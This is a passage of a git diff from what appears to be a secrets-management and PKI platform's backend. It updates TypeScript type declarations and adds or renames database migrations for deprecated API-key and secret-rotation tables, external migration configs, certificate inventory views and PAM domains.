TCertificateCleanupServiceFactory } from "@app/services/certificate-cleanup/certificate-cleanup-service"; import { TCertificateEstV3ServiceFactory } from "@app/services/certificate-est-v3/certificate-est-v3-service"; +import { TCertificateInventoryViewServiceFactory } from "@app/services/certificate-inventory-view/certificate-inventory-view-service"; import { TCertificatePolicyServiceFactory } from "@app/services/certificate-policy/certificate-policy-service"; import { TCertificateProfileServiceFactory } from "@app/services/certificate-profile/certificate-profile-service"; import { TCertificateRequestServiceFactory } from "@app/services/certificate-request/certificate-request-service"; @@ -152,7 +154,6 @@ import { TSlackServiceFactory } from "@app/services/slack/slack-service"; import { TSuperAdminServiceFactory } from "@app/services/super-admin/super-admin-service"; import { TTelemetryServiceFactory } from "@app/services/telemetry/telemetry-service"; import { TTotpServiceFactory } from "@app/services/totp/totp-service"; -import { TUpgradePathService } from "@app/services/upgrade-path/upgrade-path-service"; import { TUserDALFactory } from "@app/services/user/user-dal"; import { TUserServiceFactory } from "@app/services/user/user-service"; import { TUserEngagementServiceFactory } from "@app/services/user-engagement/user-engagement-service"; @@ -217,6 +218,7 @@ declare module "fastify" { userId: string; orgId?: string; user: TUsers; + requiredMfaMethod: MfaMethod; }; // identity injection. depending on which kinda of token the information is filled in auth auth: TAuthMode; @@ -265,7 +267,6 @@ declare module "fastify" { user: TUserServiceFactory; group: TGroupServiceFactory; groupProject: TGroupProjectServiceFactory; - apiKey: TApiKeyServiceFactory; pkiAlert: TPkiAlertServiceFactory; project: TProjectServiceFactory; projectMembership: TProjectMembershipServiceFactory; @@ -303,7 +304,6 @@ declare module "fastify" { accessApprovalRequest: TAccessApprovalRequestServiceFactory; secretApprovalPolicy: TSecretApprovalPolicyServiceFactory; secretApprovalRequest: TSecretApprovalRequestServiceFactory; - secretRotation: TSecretRotationServiceFactory; snapshot: TSecretSnapshotServiceFactory; saml: TSamlConfigServiceFactory; scim: TScimServiceFactory; @@ -312,6 +312,7 @@ declare module "fastify" { auditLogStream: TAuditLogStreamServiceFactory; certificate: TCertificateServiceFactory; certificateCleanup: TCertificateCleanupServiceFactory; + certificateInventoryView: TCertificateInventoryViewServiceFactory; certificateV3: TCertificateV3ServiceFactory; certificateRequest: TCertificateRequestServiceFactory; certificateTemplate: TCertificateTemplateServiceFactory; @@ -363,8 +364,10 @@ declare module "fastify" { secretRotationV2: TSecretRotationV2ServiceFactory; microsoftTeams: TMicrosoftTeamsServiceFactory; assumePrivileges: TAssumePrivilegeServiceFactory; + insights: TInsightsServiceFactory; relay: TRelayServiceFactory; gatewayV2: TGatewayV2ServiceFactory; + gatewayPool: TGatewayPoolServiceFactory; githubOrgSync: TGithubOrgSyncServiceFactory; folderCommit: TFolderCommitServiceFactory; pit: TPitServiceFactory; @@ -380,6 +383,7 @@ declare module "fastify" { offlineUsageReport: TOfflineUsageReportServiceFactory; pamFolder: TPamFolderServiceFactory; pamResource: TPamResourceServiceFactory; + pamDomain: TPamDomainServiceFactory; pamResourceRotationRules: TPamResourceRotationRulesServiceFactory; pamAccount: TPamAccountServiceFactory; pamAccountPolicy: TPamAccountPolicyServiceFactory; @@ -387,8 +391,6 @@ declare module "fastify" { pamWebAccess: TPamWebAccessServiceFactory; pamDiscoverySource: TPamDiscoverySourceServiceFactory; mfaSession: TMfaSessionServiceFactory; - upgradePath: TUpgradePathService; - membershipUser: TMembershipUserServiceFactory; membershipIdentity: TMembershipIdentityServiceFactory; membershipGroup: TMembershipGroupServiceFactory; diff --git a/backend/src/@types/knex.d.ts b/backend/src/@types/knex.d.ts index 9b474f1b81d..12fe095e2de 100644 --- a/backend/src/@types/knex.d.ts +++ b/backend/src/@types/knex.d.ts @@ -41,9 +41,6 @@ import { TAiMcpServerUserCredentials, TAiMcpServerUserCredentialsInsert, TAiMcpServerUserCredentialsUpdate, - TApiKeys, - TApiKeysInsert, - TApiKeysUpdate, TAppConnectionCredentialRotations, TAppConnectionCredentialRotationsInsert, TAppConnectionCredentialRotationsUpdate, @@ -110,6 +107,9 @@ import { TCertificateCleanupConfigs, TCertificateCleanupConfigsInsert, TCertificateCleanupConfigsUpdate, + TCertificateInventoryViews, + TCertificateInventoryViewsInsert, + TCertificateInventoryViewsUpdate, TCertificates, TCertificateSecrets, TCertificateSecretsInsert, @@ -140,6 +140,9 @@ import { TExternalKms, TExternalKmsInsert, TExternalKmsUpdate, + TExternalMigrationConfigs, + TExternalMigrationConfigsInsert, + TExternalMigrationConfigsUpdate, TFolderCheckpointResources, TFolderCheckpointResourcesInsert, TFolderCheckpointResourcesUpdate, @@ -158,6 +161,15 @@ import { TFolderTreeCheckpoints, TFolderTreeCheckpointsInsert, TFolderTreeCheckpointsUpdate, + TGatewayEnrollmentTokens, + TGatewayEnrollmentTokensInsert, + TGatewayEnrollmentTokensUpdate, + TGatewayPoolMemberships, + TGatewayPoolMembershipsInsert, + TGatewayPoolMembershipsUpdate, + TGatewayPools, + TGatewayPoolsInsert, + TGatewayPoolsUpdate, TGateways, TGatewaysInsert, TGatewaysUpdate, @@ -368,6 +380,9 @@ import { TPkiEstEnrollmentConfigs, TPkiEstEnrollmentConfigsInsert, TPkiEstEnrollmentConfigsUpdate, + TPkiScepDynamicChallenges, + TPkiScepDynamicChallengesInsert, + TPkiScepDynamicChallengesUpdate, TPkiScepEnrollmentConfigs, TPkiScepEnrollmentConfigsInsert, TPkiScepEnrollmentConfigsUpdate, @@ -488,15 +503,6 @@ import { TSecretReferencesV2, TSecretReferencesV2Insert, TSecretReferencesV2Update, - TSecretRotationOutputs, - TSecretRotationOutputsInsert, - TSecretRotationOutputsUpdate, - TSecretRotationOutputV2, - TSecretRotationOutputV2Insert, - TSecretRotationOutputV2Update, - TSecretRotations, - TSecretRotationsInsert, - TSecretRotationsUpdate, TSecretRotationsV2, TSecretRotationsV2Insert, TSecretRotationsV2Update, @@ -706,6 +712,7 @@ import { TPamDiscoverySourcesInsert, TPamDiscoverySourcesUpdate } from "@app/db/schemas/pam-discovery-sources"; +import { TPamDomains, TPamDomainsInsert, TPamDomainsUpdate } from "@app/db/schemas/pam-domains"; import { TPamFolders, TPamFoldersInsert, TPamFoldersUpdate } from "@app/db/schemas/pam-folders"; import { TPamResourceFavorites, @@ -881,6 +888,11 @@ declare module "knex/types/tables" { TPkiScepTransactionsInsert, TPkiScepTransactionsUpdate >; + [TableName.PkiScepDynamicChallenge]: KnexOriginal.CompositeTableType< + TPkiScepDynamicChallenges, + TPkiScepDynamicChallengesInsert, + TPkiScepDynamicChallengesUpdate + >; [TableName.PkiApiEnrollmentConfig]: KnexOriginal.CompositeTableType< TPkiApiEnrollmentConfigs, TPkiApiEnrollmentConfigsInsert, @@ -1035,7 +1047,6 @@ declare module "knex/types/tables" { >; [TableName.UserAction]: KnexOriginal.CompositeTableType; [TableName.SuperAdmin]: KnexOriginal.CompositeTableType; - [TableName.ApiKey]: KnexOriginal.CompositeTableType; [TableName.Project]: KnexOriginal.CompositeTableType; [TableName.ProjectSshConfig]: KnexOriginal.CompositeTableType< TProjectSshConfigs, @@ -1264,16 +1275,6 @@ declare module "knex/types/tables" { TSecretApprovalPoliciesEnvironmentsInsert, TSecretApprovalPoliciesEnvironmentsUpdate >; - [TableName.SecretRotation]: KnexOriginal.CompositeTableType< - TSecretRotations, - TSecretRotationsInsert, - TSecretRotationsUpdate - >; - [TableName.SecretRotationOutput]: KnexOriginal.CompositeTableType< - TSecretRotationOutputs, - TSecretRotationOutputsInsert, - TSecretRotationOutputsUpdate - >; [TableName.Snapshot]: KnexOriginal.CompositeTableType< TSecretSnapshots, TSecretSnapshotsInsert, @@ -1374,11 +1375,6 @@ declare module "knex/types/tables" { TSecretApprovalRequestSecretTagsV2Insert, TSecretApprovalRequestSecretTagsV2Update >; - [TableName.SecretRotationOutputV2]: KnexOriginal.CompositeTableType< - TSecretRotationOutputV2, - TSecretRotationOutputV2Insert, - TSecretRotationOutputV2Update - >; // KMS service [TableName.KmsServerRootConfig]: KnexOriginal.CompositeTableType< TKmsRootConfig, @@ -1585,6 +1581,17 @@ declare module "knex/types/tables" { TOrgGatewayConfigV2Update >; [TableName.GatewayV2]: KnexOriginal.CompositeTableType; + [TableName.GatewayEnrollmentTokens]: KnexOriginal.CompositeTableType< + TGatewayEnrollmentTokens, + TGatewayEnrollmentTokensInsert, + TGatewayEnrollmentTokensUpdate + >; + [TableName.GatewayPool]: KnexOriginal.CompositeTableType; + [TableName.GatewayPoolMembership]: KnexOriginal.CompositeTableType< + TGatewayPoolMemberships, + TGatewayPoolMembershipsInsert, + TGatewayPoolMembershipsUpdate + >; [TableName.UserNotifications]: KnexOriginal.CompositeTableType< TUserNotifications, TUserNotificationsInsert, @@ -1602,6 +1609,7 @@ declare module "knex/types/tables" { TPamResourceFavoritesInsert, TPamResourceFavoritesUpdate >; + [TableName.PamDomain]: KnexOriginal.CompositeTableType; [TableName.PamAccount]: KnexOriginal.CompositeTableType; [TableName.PamAccountPolicy]: KnexOriginal.CompositeTableType< TPamAccountPolicies, @@ -1662,10 +1670,10 @@ declare module "knex/types/tables" { TAdditionalPrivilegesInsert, TAdditionalPrivilegesUpdate >; - [TableName.VaultExternalMigrationConfig]: KnexOriginal.CompositeTableType< - TVaultExternalMigrationConfigs, - TVaultExternalMigrationConfigsInsert, - TVaultExternalMigrationConfigsUpdate + [TableName.ExternalMigrationConfig]: KnexOriginal.CompositeTableType< + TExternalMigrationConfigs, + TExternalMigrationConfigsInsert, + TExternalMigrationConfigsUpdate >; [TableName.WebAuthnCredential]: KnexOriginal.CompositeTableType< TWebauthnCredentials, @@ -1769,10 +1777,20 @@ declare module "knex/types/tables" { TCertificateCleanupConfigsInsert, TCertificateCleanupConfigsUpdate >; + [TableName.CertificateInventoryView]: KnexOriginal.CompositeTableType< + TCertificateInventoryViews, + TCertificateInventoryViewsInsert, + TCertificateInventoryViewsUpdate + >; [TableName.SecretValidationRule]: KnexOriginal.CompositeTableType< TSecretValidationRules, TSecretValidationRulesInsert, TSecretValidationRulesUpdate >; + [TableName.VaultExternalMigrationConfig]: KnexOriginal.CompositeTableType< + TVaultExternalMigrationConfigs, + TVaultExternalMigrationConfigsInsert, + TVaultExternalMigrationConfigsUpdate + >; } } diff --git a/backend/src/auto-start-migrations.ts b/backend/src/auto-start-migrations.ts index 19448f4a44e..eb78825c079 100644 --- a/backend/src/auto-start-migrations.ts +++ b/backend/src/auto-start-migrations.ts @@ -297,6 +297,7 @@ const withStartupLock = async (db: Knex, logger: Logger, doMigrations: () => Pro export const runMigrations = async ({ applicationDb, auditLogDb, clickhouseClient, logger }: TArgs) => { const generateSanitizedSchema = process.env.GENERATE_SANITIZED_SCHEMA === "true"; + const failOnSanitizedSchemaError = process.env.FAIL_ON_SANITIZED_SCHEMA_ERROR === "true"; try { // akhilmhdh(Feb 10 2025): 2 years from now remove this @@ -369,6 +370,9 @@ export const runMigrations = async ({ applicationDb, auditLogDb, clickhouseClien { err, errorId: SANITIZED_SCHEMA_ERROR, phase: "recreate" }, `${SANITIZED_SCHEMA_ERROR}: Failed to recreate sanitized schema` ); + if (failOnSanitizedSchemaError) { + throw err; + } } } return; @@ -424,6 +428,9 @@ export const runMigrations = async ({ applicationDb, auditLogDb, clickhouseClien { err, errorId: SANITIZED_SCHEMA_ERROR, phase: "create" }, `${SANITIZED_SCHEMA_ERROR}: Failed to create sanitized schema after migrations` ); + if (failOnSanitizedSchemaError) { + throw err; + } } } } catch (err) { diff --git a/backend/src/db/migrations/20231207105059_api-key.ts b/backend/src/db/migrations/20231207105059_api-key.ts index bb65ffadfde..fbb16208c9a 100644 --- a/backend/src/db/migrations/20231207105059_api-key.ts +++ b/backend/src/db/migrations/20231207105059_api-key.ts @@ -4,9 +4,9 @@ import { TableName } from "../schemas"; import { createOnUpdateTrigger, dropOnUpdateTrigger } from "../utils"; export async function up(knex: Knex): Promise { - const isTablePresent = await knex.schema.hasTable(TableName.ApiKey); + const isTablePresent = await knex.schema.hasTable(TableName.DeprecatedApiKey); if (!isTablePresent) { - await knex.schema.createTable(TableName.ApiKey, (t) => { + await knex.schema.createTable(TableName.DeprecatedApiKey, (t) => { t.string("id", 36).primary().defaultTo(knex.fn.uuid()); t.string("name").notNullable(); t.datetime("lastUsed"); @@ -17,10 +17,10 @@ export async function up(knex: Knex): Promise { t.foreign("userId").references("id").inTable(TableName.Users).onDelete("CASCADE"); }); } - await createOnUpdateTrigger(knex, TableName.ApiKey); + await createOnUpdateTrigger(knex, TableName.DeprecatedApiKey); } export async function down(knex: Knex): Promise { - await knex.schema.dropTableIfExists(TableName.ApiKey); - await dropOnUpdateTrigger(knex, TableName.ApiKey); + await knex.schema.dropTableIfExists(TableName.DeprecatedApiKey); + await dropOnUpdateTrigger(knex, TableName.DeprecatedApiKey); } diff --git a/backend/src/db/migrations/20240102152111_secret-rotation.ts b/backend/src/db/migrations/20240102152111_secret-rotation.ts index ea962cc6ec6..1e3508a728f 100644 --- a/backend/src/db/migrations/20240102152111_secret-rotation.ts +++ b/backend/src/db/migrations/20240102152111_secret-rotation.ts @@ -4,8 +4,8 @@ import { TableName } from "../schemas"; import { createOnUpdateTrigger, dropOnUpdateTrigger } from "../utils"; export async function up(knex: Knex): Promise { - if (!(await knex.schema.hasTable(TableName.SecretRotation))) { - await knex.schema.createTable(TableName.SecretRotation, (t) => { + if (!(await knex.schema.hasTable(TableName.DeprecatedSecretRotationV1))) { + await knex.schema.createTable(TableName.DeprecatedSecretRotationV1, (t) => { t.uuid("id", { primaryKey: true }).defaultTo(knex.fn.uuid()); t.string("provider").notNullable(); t.string("secretPath").notNullable(); @@ -23,22 +23,22 @@ export async function up(knex: Knex): Promise { t.timestamps(true, true, true); }); } - await createOnUpdateTrigger(knex, TableName.SecretRotation); + await createOnUpdateTrigger(knex, TableName.DeprecatedSecretRotationV1); - if (!(await knex.schema.hasTable(TableName.SecretRotationOutput))) { - await knex.schema.createTable(TableName.SecretRotationOutput, (t) => { + if (!(await knex.schema.hasTable(TableName.DeprecatedSecretRotationOutput))) { + await knex.schema.createTable(TableName.DeprecatedSecretRotationOutput, (t) => { t.uuid("id", { primaryKey: true }).defaultTo(knex.fn.uuid()); t.string("key").notNullable(); t.uuid("secretId").notNullable(); t.foreign("secretId").references("id").inTable(TableName.Secret).onDelete("CASCADE"); t.uuid("rotationId").notNullable(); - t.foreign("rotationId").references("id").inTable(TableName.SecretRotation).onDelete("CASCADE"); + t.foreign("rotationId").references("id").inTable(TableName.DeprecatedSecretRotationV1).onDelete("CASCADE"); }); } } export async function down(knex: Knex): Promise { - await knex.schema.dropTableIfExists(TableName.SecretRotationOutput); - await knex.schema.dropTableIfExists(TableName.SecretRotation); - await dropOnUpdateTrigger(knex, TableName.SecretRotation); + await dropOnUpdateTrigger(knex, TableName.DeprecatedSecretRotationV1); + await knex.schema.dropTableIfExists(TableName.DeprecatedSecretRotationOutput); + await knex.schema.dropTableIfExists(TableName.DeprecatedSecretRotationV1); } diff --git a/backend/src/db/migrations/20240730181850_secret-v2.ts b/backend/src/db/migrations/20240730181850_secret-v2.ts index d44c67cf1a5..1d461afde3f 100644 --- a/backend/src/db/migrations/20240730181850_secret-v2.ts +++ b/backend/src/db/migrations/20240730181850_secret-v2.ts @@ -134,14 +134,14 @@ export async function up(knex: Knex): Promise { }); } - if (!(await knex.schema.hasTable(TableName.SecretRotationOutputV2))) { - await knex.schema.createTable(TableName.SecretRotationOutputV2, (t) => { + if (!(await knex.schema.hasTable(TableName.DeprecatedSecretRotationOutputV2))) { + await knex.schema.createTable(TableName.DeprecatedSecretRotationOutputV2, (t) => { t.uuid("id", { primaryKey: true }).defaultTo(knex.fn.uuid()); t.string("key").notNullable(); t.uuid("secretId").notNullable(); t.foreign("secretId").references("id").inTable(TableName.SecretV2).onDelete("CASCADE"); t.uuid("rotationId").notNullable(); - t.foreign("rotationId").references("id").inTable(TableName.SecretRotation).onDelete("CASCADE"); + t.foreign("rotationId").references("id").inTable(TableName.DeprecatedSecretRotationV1).onDelete("CASCADE"); }); } } @@ -154,7 +154,7 @@ export async function down(knex: Knex): Promise { await knex.schema.dropTableIfExists(TableName.SecretV2JnTag); await knex.schema.dropTableIfExists(TableName.SecretReferenceV2); - await knex.schema.dropTableIfExists(TableName.SecretRotationOutputV2); + await knex.schema.dropTableIfExists(TableName.DeprecatedSecretRotationOutputV2); await dropOnUpdateTrigger(knex, TableName.SecretVersionV2); await knex.schema.dropTableIfExists(TableName.SecretVersionV2Tag); diff --git a/backend/src/db/migrations/20250210101841_secret-rotation-to-kms.ts b/backend/src/db/migrations/20250210101841_secret-rotation-to-kms.ts index aef429ab98d..4ce97480db5 100644 --- a/backend/src/db/migrations/20250210101841_secret-rotation-to-kms.ts +++ b/backend/src/db/migrations/20250210101841_secret-rotation-to-kms.ts @@ -2,7 +2,6 @@ import { Knex } from "knex"; import { inMemoryKeyStore } from "@app/keystore/memory"; import { crypto } from "@app/lib/crypto/cryptography"; -import { selectAllTableCols } from "@app/lib/knex"; import { initLogger } from "@app/lib/logger"; import { kmsRootConfigDALFactory } from "@app/services/kms/kms-root-config-dal"; import { KmsDataKey } from "@app/services/kms/kms-types"; @@ -15,11 +14,14 @@ import { getMigrationEncryptionServices, getMigrationHsmService } from "./utils/ const BATCH_SIZE = 500; export async function up(knex: Knex): Promise { - const hasEncryptedRotationData = await knex.schema.hasColumn(TableName.SecretRotation, "encryptedRotationData"); + const hasEncryptedRotationData = await knex.schema.hasColumn( + TableName.DeprecatedSecretRotationV1, + "encryptedRotationData" + ); - const hasRotationTable = await knex.schema.hasTable(TableName.SecretRotation); + const hasRotationTable = await knex.schema.hasTable(TableName.DeprecatedSecretRotationV1); if (hasRotationTable) { - await knex.schema.alterTable(TableName.SecretRotation, (t) => { + await knex.schema.alterTable(TableName.DeprecatedSecretRotationV1, (t) => { if (!hasEncryptedRotationData) t.binary("encryptedRotationData"); }); } @@ -36,9 +38,9 @@ export async function up(knex: Knex): Promise { const projectEncryptionRingBuffer = createCircularCache>>(25); - const secretRotations = await knex(TableName.SecretRotation) - .join(TableName.Environment, `${TableName.Environment}.id`, `${TableName.SecretRotation}.envId`) - .select(selectAllTableCols(TableName.SecretRotation)) + const secretRotations = await knex(TableName.DeprecatedSecretRotationV1) + .join(TableName.Environment, `${TableName.Environment}.id`, `${TableName.DeprecatedSecretRotationV1}.envId`) + .select(`${TableName.DeprecatedSecretRotationV1}.*`) .select(knex.ref("projectId").withSchema(TableName.Environment)) .orderBy(`${TableName.Environment}.projectId` as "projectId"); @@ -88,25 +90,28 @@ export async function up(knex: Knex): Promise { for (let i = 0; i < updatedRotationData.length; i += BATCH_SIZE) { // eslint-disable-next-line no-await-in-loop - await knex(TableName.SecretRotation) + await knex(TableName.DeprecatedSecretRotationV1) .insert(updatedRotationData.slice(i, i + BATCH_SIZE)) .onConflict("id") .merge(); } if (hasRotationTable) { - await knex.schema.alterTable(TableName.SecretRotation, (t) => { + await knex.schema.alterTable(TableName.DeprecatedSecretRotationV1, (t) => { if (!hasEncryptedRotationData) t.binary("encryptedRotationData").notNullable().alter(); }); } } export async function down(knex: Knex): Promise { - const hasEncryptedRotationData = await knex.schema.hasColumn(TableName.SecretRotation, "encryptedRotationData"); + const hasEncryptedRotationData = await knex.schema.hasColumn( + TableName.DeprecatedSecretRotationV1, + "encryptedRotationData" + ); - const hasRotationTable = await knex.schema.hasTable(TableName.SecretRotation); + const hasRotationTable = await knex.schema.hasTable(TableName.DeprecatedSecretRotationV1); if (hasRotationTable) { - await knex.schema.alterTable(TableName.SecretRotation, (t) => { + await knex.schema.alterTable(TableName.DeprecatedSecretRotationV1, (t) => { if (hasEncryptedRotationData) t.dropColumn("encryptedRotationData"); }); } diff --git a/backend/src/db/migrations/20260327210655_drop-queue-persistence.ts b/backend/src/db/migrations/20260327210655_drop-queue-persistence.ts index d929b040162..c027069518e 100644 --- a/backend/src/db/migrations/20260327210655_drop-queue-persistence.ts +++ b/backend/src/db/migrations/20260327210655_drop-queue-persistence.ts @@ -7,8 +7,8 @@ const QUEUE_JOBS_TABLE = "queue_jobs"; export async function up(knex: Knex): Promise { const hasTable = await knex.schema.hasTable(QUEUE_JOBS_TABLE); if (hasTable) { - await knex.schema.dropTable(QUEUE_JOBS_TABLE); await dropOnUpdateTrigger(knex, QUEUE_JOBS_TABLE); + await knex.schema.dropTable(QUEUE_JOBS_TABLE); } } diff --git a/backend/src/db/migrations/20260330172252_rename-vault-to-external-migration-config.ts b/backend/src/db/migrations/20260330172252_rename-vault-to-external-migration-config.ts new file mode 100644 index 00000000000..b91e97c9fa8 --- /dev/null +++ b/backend/src/db/migrations/20260330172252_rename-vault-to-external-migration-config.ts @@ -0,0 +1,71 @@ +import { Knex } from "knex"; + +import { inMemoryKeyStore } from "@app/keystore/memory"; +import { selectAllTableCols } from "@app/lib/knex"; +import { initLogger } from "@app/lib/logger"; +import { ExternalMigrationProviders } from "@app/services/external-migration/external-migration-schemas"; +import { kmsRootConfigDALFactory } from "@app/services/kms/kms-root-config-dal"; +import { KmsDataKey } from "@app/services/kms/kms-types"; +import { superAdminDALFactory } from "@app/services/super-admin/super-admin-dal"; + +import { TableName } from "../schemas"; +import { createOnUpdateTrigger, dropOnUpdateTrigger } from "../utils"; +import { getMigrationEnvConfig, getMigrationHsmConfig } from "./utils/env-config"; +import { getMigrationEncryptionServices, getMigrationHsmService } from "./utils/services"; + +export async function up(knex: Knex): Promise { + initLogger(); + const { hsmService } = await getMigrationHsmService({ envConfig: getMigrationHsmConfig() }); + const superAdminDAL = superAdminDALFactory(knex); + const kmsRootConfigDAL = kmsRootConfigDALFactory(knex); + const envConfig = await getMigrationEnvConfig(superAdminDAL, hsmService, kmsRootConfigDAL); + const keyStore = inMemoryKeyStore(); + const { kmsService } = await getMigrationEncryptionServices({ envConfig, keyStore, db: knex }); + + if (!(await knex.schema.hasTable(TableName.ExternalMigrationConfig))) { + await knex.schema.createTable(TableName.ExternalMigrationConfig, (t) => { + t.uuid("id", { primaryKey: true }).defaultTo(knex.fn.uuid()); + t.uuid("orgId").notNullable(); + t.foreign("orgId").references("id").inTable(TableName.Organization).onDelete("CASCADE"); + t.string("provider").notNullable(); + t.binary("encryptedConfig").notNullable(); + t.uuid("connectionId"); + t.foreign("connectionId").references("id").inTable(TableName.AppConnection); + t.timestamps(true, true, true); + }); + + await createOnUpdateTrigger(knex, TableName.ExternalMigrationConfig); + + if (await knex.schema.hasTable(TableName.VaultExternalMigrationConfig)) { + const existingVaultConfigs = await knex(TableName.VaultExternalMigrationConfig).select( + selectAllTableCols(TableName.VaultExternalMigrationConfig) + ); + + await Promise.all( + existingVaultConfigs.map(async (vaultConfig) => { + const { encryptor } = await kmsService.createCipherPairWithDataKey({ + orgId: vaultConfig.orgId, + type: KmsDataKey.Organization + }); + + const config = { + namespace: vaultConfig.namespace + }; + const { cipherTextBlob: encryptedConfig } = encryptor({ plainText: Buffer.from(JSON.stringify(config)) }); + + await knex(TableName.ExternalMigrationConfig).insert({ + orgId: vaultConfig.orgId, + provider: ExternalMigrationProviders.Vault, + encryptedConfig, + connectionId: vaultConfig.connectionId + }); + }) + ); + } + } +} + +export async function down(knex: Knex): Promise { + await knex.schema.dropTableIfExists(TableName.ExternalMigrationConfig); + await dropOnUpdateTrigger(knex, TableName.ExternalMigrationConfig); +} diff --git a/backend/src/db/migrations/20260401124650_certificate-inventory-views.ts b/backend/src/db/migrations/20260401124650_certificate-inventory-views.ts new file mode 100644 index 00000000000..261954af475 --- /dev/null +++ b/backend/src/db/migrations/20260401124650_certificate-inventory-views.ts @@ -0,0 +1,36 @@ +import { Knex } from "knex"; + +import { TableName } from "../schemas"; +import { createOnUpdateTrigger, dropOnUpdateTrigger } from "../utils"; + +export async function up(knex: Knex): Promise { + if (!(await knex.schema.hasTable(TableName.CertificateInventoryView))) { + await knex.schema.createTable(TableName.CertificateInventoryView, (t) => { + t.uuid("id", { primaryKey: true }).defaultTo(knex.fn.uuid()); + + t.string("projectId").notNullable(); + t.foreign("projectId").references("id").inTable(TableName.Project).onDelete("CASCADE"); + + t.string("name", 255).notNullable(); + t.jsonb("filters").notNullable(); + t.jsonb("columns").nullable(); + + t.uuid("createdByUserId").nullable(); + t.foreign("createdByUserId").references("id").inTable(TableName.Users).onDelete("SET NULL"); + + t.timestamps(true, true, true); + + t.index(["projectId", "createdByUserId"]); + t.unique(["projectId", "name", "createdByUserId"]); + }); + + await createOnUpdateTrigger(knex, TableName.CertificateInventoryView); + } +} + +export async function down(knex: Knex): Promise { + if (await knex.schema.hasTable(TableName.CertificateInventoryView)) { + await dropOnUpdateTrigger(knex, TableName.CertificateInventoryView); + await knex.schema.dropTable(TableName.CertificateInventoryView); + } +} diff --git a/backend/src/db/migrations/20260404140728_username-merge.ts b/backend/src/db/migrations/20260404140728_username-merge.ts index 12e693f9b6c..d8d652642bf 100644 --- a/backend/src/db/migrations/20260404140728_username-merge.ts +++ b/backend/src/db/migrations/20260404140728_username-merge.ts @@ -40,6 +40,7 @@ export async function up(knex: Knex): Promise { UPDATE "${TableName.Users}" SET "isGitHubVerified" = TRUE WHERE "authMethods" @> ARRAY['github']::text[] + AND "isAccepted" = TRUE AND ("isGitHubVerified" IS NULL OR "isGitHubVerified" = FALSE) `); @@ -47,6 +48,7 @@ export async function up(knex: Knex): Promise { UPDATE "${TableName.Users}" SET "isGoogleVerified" = TRUE WHERE "authMethods" @> ARRAY['google']::text[] + AND "isAccepted" = TRUE AND ("isGoogleVerified" IS NULL OR "isGoogleVerified" = FALSE) `); @@ -54,6 +56,7 @@ export async function up(knex: Knex): Promise { UPDATE "${TableName.Users}" SET "isGitLabVerified" = TRUE WHERE "authMethods" @> ARRAY['gitlab']::text[] + AND "isAccepted" = TRUE AND ("isGitLabVerified" IS NULL OR "isGitLabVerified" = FALSE) `); log(`Step 2 done in ${Date.now() - t}ms`); diff --git a/backend/src/db/migrations/20260408062748_pam-domains.ts b/backend/src/db/migrations/20260408062748_pam-domains.ts new file mode 100644 index 00000000000..3de691870ba --- /dev/null +++ b/backend/src/db/migrations/20260408062748_pam-domains.ts @@ -0,0 +1,219 @@ +/* eslint-disable no-await-in-loop, @typescript-eslint/no-explicit-any */ +import { Knex } from "knex"; + +import { TableName } from "../schemas"; +import { createOnUpdateTrigger, dropOnUpdateTrigger } from "../utils"; + +export async function up(knex: Knex): Promise { + // \Create pam_domains table + if (!(await knex.schema.hasTable(TableName.PamDomain))) { + await knex.schema.createTable(TableName.PamDomain, (t) => { + t.uuid("id", { primaryKey: true }).defaultTo(knex.fn.uuid()); + + t.string("projectId").notNullable(); + t.foreign("projectId").references("id").inTable(TableName.Project).onDelete("CASCADE"); + t.index("projectId"); + + t.string("name").notNullable(); + t.index("name"); + + t.string("domainType").notNullable(); + t.index("domainType"); + + t.uuid("gatewayId").nullable(); + t.foreign("gatewayId").references("id").inTable(TableName.GatewayV2); + t.index("gatewayId"); + + t.binary("encryptedConnectionDetails").notNullable(); + t.string("discoveryFingerprint").nullable(); + + t.unique(["projectId", "name"]); + + t.timestamps(true, true, true); + }); + + await createOnUpdateTrigger(knex, TableName.PamDomain); + } + + // Add domainId to pam_resources + if (await knex.schema.hasTable(TableName.PamResource)) { + const hasDomainId = await knex.schema.hasColumn(TableName.PamResource, "domainId"); + if (!hasDomainId) { + await knex.schema.alterTable(TableName.PamResource, (t) => { + t.uuid("domainId").nullable(); + t.foreign("domainId").references("id").inTable(TableName.PamDomain).onDelete("SET NULL"); + t.index("domainId"); + }); + } + } + + // Add domainId to pam_accounts (exactly one of resourceId/domainId must be set) + if (await knex.schema.hasTable(TableName.PamAccount)) { + const hasDomainId = await knex.schema.hasColumn(TableName.PamAccount, "domainId"); + if (!hasDomainId) { + await knex.schema.alterTable(TableName.PamAccount, (t) => { + t.uuid("domainId").nullable(); + t.foreign("domainId").references("id").inTable(TableName.PamDomain).onDelete("CASCADE"); + t.index("domainId"); + }); + + await knex.schema.alterTable(TableName.PamAccount, (t) => { + t.uuid("resourceId").nullable().alter(); + }); + + await knex.raw(` + ALTER TABLE ${TableName.PamAccount} + ADD CONSTRAINT chk_pam_account_parent + CHECK ( + (("resourceId" IS NOT NULL AND "domainId" IS NULL) OR ("resourceId" IS NULL AND "domainId" IS NOT NULL)) + ) + `); + } + } + + // Add pamDomainId to resource_metadata + if (await knex.schema.hasTable(TableName.ResourceMetadata)) { + const hasPamDomainId = await knex.schema.hasColumn(TableName.ResourceMetadata, "pamDomainId"); + if (!hasPamDomainId) { + await knex.schema.alterTable(TableName.ResourceMetadata, (t) => { + t.uuid("pamDomainId").nullable(); + t.foreign("pamDomainId").references("id").inTable(TableName.PamDomain).onDelete("CASCADE"); + }); + } + } + + // Migrate existing AD resources to domains (preserving IDs for referential integrity) + const adResources = await knex(TableName.PamResource).where("resourceType", "active-directory").select("*"); + + for (const adResource of adResources) { + await knex(TableName.PamDomain).insert({ + id: adResource.id, + projectId: adResource.projectId, + name: adResource.name, + domainType: "active-directory", + gatewayId: adResource.gatewayId, + encryptedConnectionDetails: adResource.encryptedConnectionDetails, + discoveryFingerprint: adResource.discoveryFingerprint + } as any); + + await knex(TableName.PamAccount) + .where("resourceId", adResource.id) + .update({ + domainId: adResource.id, + resourceId: null + } as any); + + await knex(TableName.PamResource) + .where("adServerResourceId", adResource.id) + .update({ + domainId: adResource.id, + adServerResourceId: null + } as any); + + await knex(TableName.PamResourceRotationRule).where("resourceId", adResource.id).delete(); + await knex(TableName.PamDiscoverySourceResource).where("resourceId", adResource.id).delete(); + + await knex(TableName.ResourceMetadata) + .where("pamResourceId", adResource.id) + .update({ + pamDomainId: adResource.id, + pamResourceId: null + } as any); + + await knex(TableName.PamResource).where("id", adResource.id).delete(); + } + + // Drop adServerResourceId column from pam_resources 